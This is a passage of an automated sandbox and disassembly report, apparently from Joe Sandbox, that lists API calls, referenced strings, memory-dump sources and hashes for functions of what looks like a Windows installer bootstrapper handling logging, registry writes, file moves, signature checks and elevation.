                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                    • API String ID: 3168844106-4121889706
                                                                                                                                                                    • Opcode ID: fd2fabeac3749254b9b1bc690b0ef0c51e95bfa6d5dbf91039b0b8341b03ecfb
                                                                                                                                                                    • Instruction ID: 48be1a2ab2b3740ce6c548e2db4ba7c286ab62119e3cbd8bb2239a814bc14929
                                                                                                                                                                    • Opcode Fuzzy Hash: fd2fabeac3749254b9b1bc690b0ef0c51e95bfa6d5dbf91039b0b8341b03ecfb
                                                                                                                                                                    • Instruction Fuzzy Hash: EA313732B0421DAFCB21DB58CC56E9A73ACAF84720B1541A6FC06EB241DB75ED808791
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 00907210
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to append escape sequence., xrefs: 009072A3
                                                                                                                                                                    • Failed to append characters., xrefs: 0090729C
                                                                                                                                                                    • Failed to format escape sequence., xrefs: 009072AA
                                                                                                                                                                    • []{}, xrefs: 0090723A
                                                                                                                                                                    • [\%c], xrefs: 0090726F
                                                                                                                                                                    • Failed to allocate buffer for escaped string., xrefs: 00907227
                                                                                                                                                                    • Failed to copy string., xrefs: 009072C4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                    • API String ID: 1659193697-3250950999
                                                                                                                                                                    • Opcode ID: 741503d3fd3cf6e17393ca416fb4362222c71847924646b79a95350cf0aad959
                                                                                                                                                                    • Instruction ID: 0317e9f88ea401a1d98b70831c2217ab7f877fa778ff65443e089ad596d28f87
                                                                                                                                                                    • Opcode Fuzzy Hash: 741503d3fd3cf6e17393ca416fb4362222c71847924646b79a95350cf0aad959
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D21E472D09219BFDB2196D8CC42FAEB7AD9F90734F210155F910B61C1DBB9BE4492A0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000000,0094B500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,009267DE,?,00000001,?,0094B4A0), ref: 00925C45
                                                                                                                                                                    Strings
                                                                                                                                                                    • feclient.dll, xrefs: 00925C3B, 00925D65
                                                                                                                                                                    • Failed to insert execute action., xrefs: 00925C9A
                                                                                                                                                                    • Failed to copy target product code., xrefs: 00925D78
                                                                                                                                                                    • Failed grow array of ordered patches., xrefs: 00925CDE
                                                                                                                                                                    • Failed to plan action for target product., xrefs: 00925CF0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                                                                                                                    • API String ID: 1825529933-3477540455
                                                                                                                                                                    • Opcode ID: af18861b8c92b984c7e0034d203970123273f408c9d65f2499e34e9fc42ea7c3
                                                                                                                                                                    • Instruction ID: a9f1276e8874c513479189cac13f172640c21b03d6aba81ea85f9e0352a23d97
                                                                                                                                                                    • Opcode Fuzzy Hash: af18861b8c92b984c7e0034d203970123273f408c9d65f2499e34e9fc42ea7c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 318144B560476A9FCB14CF58D880AAA77A8BF48324F12856AFC558B396D730EC51CF90
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0093D262,00000000,00000000,00000000,00000000,00000000,00932F1D), ref: 0093CB2F
                                                                                                                                                                    • __fassign.LIBCMT ref: 0093CBAA
                                                                                                                                                                    • __fassign.LIBCMT ref: 0093CBC5
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0093CBEB
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0093D262,00000000,?,?,?,?,?,?,?,?,?,0093D262,00000000), ref: 0093CC0A
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,0093D262,00000000,?,?,?,?,?,?,?,?,?,0093D262,00000000), ref: 0093CC43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                    • Opcode ID: b832de7b64e97f8897d8be51d82887c90ae08938ca6a4a073f235415267fe2f1
                                                                                                                                                                    • Instruction ID: ce0942255735fe27f670536f86ef633dc59895acd5b2c22745a1f8d50ace2c87
                                                                                                                                                                    • Opcode Fuzzy Hash: b832de7b64e97f8897d8be51d82887c90ae08938ca6a4a073f235415267fe2f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 6751B1B1A04649AFDB10CFA8DC95AEEBBF8EF09300F14451AE955F7251E7709941CFA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00917113,000000B8,0000001C,00000100), ref: 009292A4
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0094B4B8,000000FF,?,?,?,00917113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 0092932E
                                                                                                                                                                    Strings
                                                                                                                                                                    • comres.dll, xrefs: 009293B0
                                                                                                                                                                    • BA aborted detect forward compatible bundle., xrefs: 00929398
                                                                                                                                                                    • detect.cpp, xrefs: 0092938E
                                                                                                                                                                    • Failed to initialize update bundle., xrefs: 009293D1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                                                                                                                    • API String ID: 1825529933-439563586
                                                                                                                                                                    • Opcode ID: 3a3b06e5f9437c637c99dfa4b47666912d6f65be34c76c409a4d52076bbf6b06
                                                                                                                                                                    • Instruction ID: 6458cd642822726386769484102cb9d79ea30c356a79117ef783cd7257274ce7
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a3b06e5f9437c637c99dfa4b47666912d6f65be34c76c409a4d52076bbf6b06
                                                                                                                                                                    • Instruction Fuzzy Hash: 8451C270600225FFDF159F64EC81FAAB76AFF05310F104269F9249A2A9C772EC60DB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00905479,000000FF,00AAC56B,E90094BA,009053BD,00000000,?,E90094BA,00000000), ref: 0091AC94
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00905479,000000FF,00AAC56B,E90094BA,009053BD,00000000,?,E90094BA,00000000), ref: 0091ACD8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to verify expected payload against actual certificate chain., xrefs: 0091AD1E
                                                                                                                                                                    • Failed to get signer chain from authenticode certificate., xrefs: 0091AD06
                                                                                                                                                                    • cache.cpp, xrefs: 0091AC6A, 0091ACB8, 0091ACFC
                                                                                                                                                                    • Failed to get provider state from authenticode certificate., xrefs: 0091ACC2
                                                                                                                                                                    • Failed authenticode verification of payload: %ls, xrefs: 0091AC75
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                                                                                                                    • API String ID: 1452528299-2590768268
                                                                                                                                                                    • Opcode ID: cf12e8da13144454e5c006761439be930db2b4788a9d44d552f3d74fd923b849
                                                                                                                                                                    • Instruction ID: 43bc6c65649b4cb69ea219eb0b419c1825ceb561a55b53ae3481fe56556b3da6
                                                                                                                                                                    • Opcode Fuzzy Hash: cf12e8da13144454e5c006761439be930db2b4788a9d44d552f3d74fd923b849
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F418F76E02629ABDB11DB99DC45BEEBAB8EF44721F010129FD10BB281D6709D448BE1
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0094033C
                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,?), ref: 00940394
                                                                                                                                                                    Strings
                                                                                                                                                                    • --- logging level: %hs ---, xrefs: 00940454
                                                                                                                                                                    • === Logging started: %ls ===, xrefs: 009403BF
                                                                                                                                                                    • Executable: %ls v%d.%d.%d.%d, xrefs: 009403F0
                                                                                                                                                                    • Computer : %ls, xrefs: 00940402
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Name$ComputerFileModule
                                                                                                                                                                    • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                                                                    • API String ID: 2577110986-3153207428
                                                                                                                                                                    • Opcode ID: badcaaa045a605de4e49aef969249c0ed77a5482ab654cb5ab439fedb741b234
                                                                                                                                                                    • Instruction ID: e5ba4433e473a4e085a6003cfead919f8a01a7669c8615b0a9e4ffa043914158
                                                                                                                                                                    • Opcode Fuzzy Hash: badcaaa045a605de4e49aef969249c0ed77a5482ab654cb5ab439fedb741b234
                                                                                                                                                                    • Instruction Fuzzy Hash: 654133B2D141189BCB209F64DD85FAA77BCEBC4304F4041AAFB09A3152E674AE849F65
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000001,0094B500,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,009174E6), ref: 0091D560
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create pipe and cache pipe., xrefs: 0091D4BD
                                                                                                                                                                    • UX aborted elevation requirement., xrefs: 0091D475
                                                                                                                                                                    • Failed to connect to elevated child process., xrefs: 0091D549
                                                                                                                                                                    • Failed to elevate., xrefs: 0091D542
                                                                                                                                                                    • elevation.cpp, xrefs: 0091D46B
                                                                                                                                                                    • Failed to create pipe name and client token., xrefs: 0091D4A1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                    • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                                                                    • API String ID: 2962429428-3003415917
                                                                                                                                                                    • Opcode ID: ce1868c7396b95d6b3282478950583a084fd3c6ad11e208c446b575096ef2330
                                                                                                                                                                    • Instruction ID: d29aa3b78ae65db1b7b676d7bb7032d658f2924e33fc126f17b9c629d5f3840d
                                                                                                                                                                    • Opcode Fuzzy Hash: ce1868c7396b95d6b3282478950583a084fd3c6ad11e208c446b575096ef2330
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F313B7274A62DBFE71696A4DC46FFBB35D9F80724F104205F904A61C1DB71AE8082D5
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0091AD40,?,00000000,00000000), ref: 0091D2E9
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0091D2F5
                                                                                                                                                                      • Part of subcall function 0091CF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?), ref: 0091CF37
                                                                                                                                                                      • Part of subcall function 0091CF25: GetLastError.KERNEL32(?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0091CF41
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0091D376
                                                                                                                                                                    Strings
                                                                                                                                                                    • elevation.cpp, xrefs: 0091D319
                                                                                                                                                                    • Failed to create elevated cache thread., xrefs: 0091D323
                                                                                                                                                                    • Failed to pump messages in child process., xrefs: 0091D34D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                                                    • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                                                                                                                    • API String ID: 3606931770-4134175193
                                                                                                                                                                    • Opcode ID: 6ccfd10128d1ede7eb23e0d3c4768988f8c9db6c4e09dd5321e9b893ffc73458
                                                                                                                                                                    • Instruction ID: 60673d529d41bae4e7b81ca4d03aca69d85f84113e057ba72e1fd19cd83cfb8d
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ccfd10128d1ede7eb23e0d3c4768988f8c9db6c4e09dd5321e9b893ffc73458
                                                                                                                                                                    • Instruction Fuzzy Hash: 4841E5B6E0521DAFCB01DFA9D8859DEBBF8AF48710B10416AF918A7340E770A9418B94
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 009415DA
                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0094163C
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00941648
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 0094168B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$Value
                                                                                                                                                                    • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                    • API String ID: 198323757-1648651458
                                                                                                                                                                    • Opcode ID: cb5a70eb1101a412466c78a9bf8ccb8816eb7e7e362d5d74ddc13789e8dd1dd0
                                                                                                                                                                    • Instruction ID: 09241a508a07dd094fdab326d5db77d4e8497d6aa3a29deb683593e43dab67e9
                                                                                                                                                                    • Opcode Fuzzy Hash: cb5a70eb1101a412466c78a9bf8ccb8816eb7e7e362d5d74ddc13789e8dd1dd0
                                                                                                                                                                    • Instruction Fuzzy Hash: 0841807690062AAFCB21DF98CC85EAEBBB8FF44750F060165FD11AB210D770ED519BA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0096B5FC,00000000,?,?,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 00940533
                                                                                                                                                                    • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0096B5F4,?,00914207,00000000,Setup), ref: 009405D7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?,?,?), ref: 009405E7
                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 00940621
                                                                                                                                                                      • Part of subcall function 00902DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00902F09
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0096B5FC,?,?,0096B5F4,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 0094067A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 4111229724-3545173039
                                                                                                                                                                    • Opcode ID: 4f8baf5a48689398ad2d56283da834f5fc990908c44ad68a0dced84621ebc56a
                                                                                                                                                                    • Instruction ID: a13f6fc3069f2c2e0f1eb4e4025be45f7e172adb34c6c193a83ed3c0ed534993
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f8baf5a48689398ad2d56283da834f5fc990908c44ad68a0dced84621ebc56a
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D319231904229FFDB11AF659D45FAA766DEBC0754B020229FB02E71A0D771CD60AFA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 009239F4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format property value., xrefs: 00923A7D
                                                                                                                                                                    • Failed to format property string part., xrefs: 00923A6F
                                                                                                                                                                    • %s%="%s", xrefs: 00923A27
                                                                                                                                                                    • Failed to escape string., xrefs: 00923A76
                                                                                                                                                                    • Failed to append property string part., xrefs: 00923A68
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                                                                    • API String ID: 3613110473-515423128
                                                                                                                                                                    • Opcode ID: 63774e92892e005641b8ea10e770bcbbe53d748edc32cda46a47339cf392f5b1
                                                                                                                                                                    • Instruction ID: 663c85c09df281e8dc33115b02e17aec6914cbfb27da9e0226fb84ba581de6b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 63774e92892e005641b8ea10e770bcbbe53d748edc32cda46a47339cf392f5b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 5D31F272D00229FFCB15DF98EC42AAEBB68EF40714F10826AFC1162284D7789F50CB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001), ref: 00944203
                                                                                                                                                                    • GetLastError.KERNEL32(00000002,?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001,000007D0,00000001,00000001,00000003), ref: 00944212
                                                                                                                                                                    • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001), ref: 009442A6
                                                                                                                                                                    • GetLastError.KERNEL32(?,0094432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0091A063,00000001,000007D0,00000001), ref: 009442B0
                                                                                                                                                                      • Part of subcall function 00944440: FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                      • Part of subcall function 00944440: FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                                                    • String ID: \$fileutil.cpp
                                                                                                                                                                    • API String ID: 3479031965-1689471480
                                                                                                                                                                    • Opcode ID: d6a0cc31c681019e0188fa441e72290003c84fed2c105712b9d69ece3ae6d0a1
                                                                                                                                                                    • Instruction ID: 4519add13613abb26245c08b687efcc271ed89fe4e637c6732e36eda4b41b038
                                                                                                                                                                    • Opcode Fuzzy Hash: d6a0cc31c681019e0188fa441e72290003c84fed2c105712b9d69ece3ae6d0a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B31C136A05226ABDB215E99CC01F6F766DFFA27A0B114129FC249B250D7B08D41A7D0
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00905932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0090733E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00905932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0090741D
                                                                                                                                                                    Strings
